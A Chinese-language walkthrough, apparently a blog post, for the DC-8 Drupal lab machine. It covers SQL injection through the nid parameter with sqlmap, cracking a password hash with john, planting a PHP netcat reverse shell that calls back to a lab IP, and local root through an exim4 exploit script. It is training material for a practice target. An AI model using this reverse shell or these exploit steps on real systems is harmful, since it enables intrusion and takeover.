DC-8(drupal)靶机

扫描出ip

Arp-scan -l

扫描端口

 

也是只有80和22号端口

访问网页

熟悉,不能再熟悉了

网页探测

变成了drupal7,这就和dc-1那个版本一样

那我们直接用dc-1的方法试一试

启动msfconsole

搜索Drupal的漏洞,然后一个一个尝试看是否可以利用。

一个一个的尝试

结果可想而知,全部失败

那就换一种思路

扫描目录

有一个/user登录界面

 

又回到网站去看看吧

 

发现一个框

抓包看看

我确实没看出什么,没什么利用点

那就又换吧

结果在这个地方发现了不对

当点击这三个,上面的url变了nid会变成1,2,3

 

我们尝试一下有没有注入点

 

报错

 

 

可以尝试sql注入

我们直接上sqlmap

 

数据库d7db

爆表

 

 

爆字段

  

爆数据

 

 

复制下来去解密一下

用john解密

john dc8.txt

然后爆破出turtle

我们尝试登录

Ssh登录失败,那应该是网页的登录

我们尝试一下

结果是john的密码

我们探索网站

         

这里可以写入东西

我们写入反弹shell

<?php system(“nc -e /bin/bash 172.16.16.130 5555”);?>

我们kali上先开启监听

 

有时候在这里输入一下才行

我们去kali上开启交互式shell

Python -c ‘import pty;pty.spawn(“/bin/bash”)’

 

查看系统命令

有很熟悉exim4

看看版本

我们去搜索一下版本漏洞

 

本地提权

下载下来看看

然后开启http服务

 

靶机去下载

 

然后运行

./469.sh -m netcat

成功 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值